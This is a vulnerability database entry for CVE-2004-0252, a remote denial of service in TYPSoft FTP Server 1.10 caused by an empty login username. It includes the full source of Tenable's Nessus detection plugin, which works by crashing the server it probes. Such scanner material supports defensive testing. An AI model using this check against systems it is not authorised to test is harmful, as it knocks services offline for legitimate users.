Vulnerabilities > CVE-2004-0252 - Remote Denial Of Service vulnerability in Typsoft FTP Server 1.1

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
typsoft
nessus

Summary

TYPSoft FTP Server 1.10 allows remote attackers to cause a denial of service (CPU consumption) via an empty USER name.

Vulnerable Configurations

Part Description Count
Application
Typsoft
1

Nessus

NASL familyFTP
NASL idTYPSOFTFTP_EMPTY_USERNAME_DOS.NASL
descriptionThe remote host seems to be running TYPSoft FTP server, version 1.10. This version is prone to a remote denial of service flaw. By sending an empty login username, an attacker can cause the FTP server to crash, denying service to legitimate users.
last seen2020-06-01
modified2020-06-02
plugin id14707
published2004-09-13
reporterThis script is Copyright (C) 2004-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/14707
titleTYPSoft FTP Server Empty Username DoS
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
 script_id(14707);
 script_version("1.26");
 script_cvs_date("Date: 2018/11/15 20:50:22");

 script_cve_id("CVE-2004-0252");
 script_bugtraq_id(9573);

 script_name(english:"TYPSoft FTP Server Empty Username DoS");
 script_summary(english:"Checks for TYPSoft FTP server empty username DoS");

 script_set_attribute(attribute:"synopsis", value:
"It is possible to crash the remote FTP server." );
 script_set_attribute(attribute:"description", value:
"The remote host seems to be running TYPSoft FTP server, version 1.10. 

This version is prone to a remote denial of service flaw.  By sending
an empty login username, an attacker can cause the FTP server to
crash, denying service to legitimate users." );
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2004/Feb/114");
 script_set_attribute(attribute:"solution", value:
"Unknown at this time." );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"false");

 script_set_attribute(attribute:"plugin_publication_date", value: "2004/09/13");
 script_set_attribute(attribute:"vuln_publication_date", value: "2004/02/04");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();
 
 script_category(ACT_DENIAL);
 
 
 script_copyright(english:"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.");
 script_family(english:"FTP");
 script_dependencie("find_service_3digits.nasl", "ftpserver_detect_type_nd_version.nasl");
 script_require_ports("Services/ftp", 21);
 script_require_keys("ftp/typsoftftp");
 exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");
include("ftp_func.inc");


port = get_ftp_port(default: 21);

login = "";
pass  = get_kb_item("ftp/password");

soc = open_sock_tcp(port);
if (! soc ) exit(1, "TCP connection failed to port "+port+".");
if (! ftp_authenticate(socket:soc, user:login, pass:pass))
 exit(0, "Cannot authenticate on FTP server on port "+port+".");

#ftp_close(socket: soc);
for (i = 0; i < 3; i ++)
{
  sleep(1);
  soc2 = open_sock_tcp(port);
  if (soc2) break;
}

if (! soc2 || ! recv_line(socket:soc2, length:4096))
 security_warning(port);

if (soc2) close(soc2);
close(soc);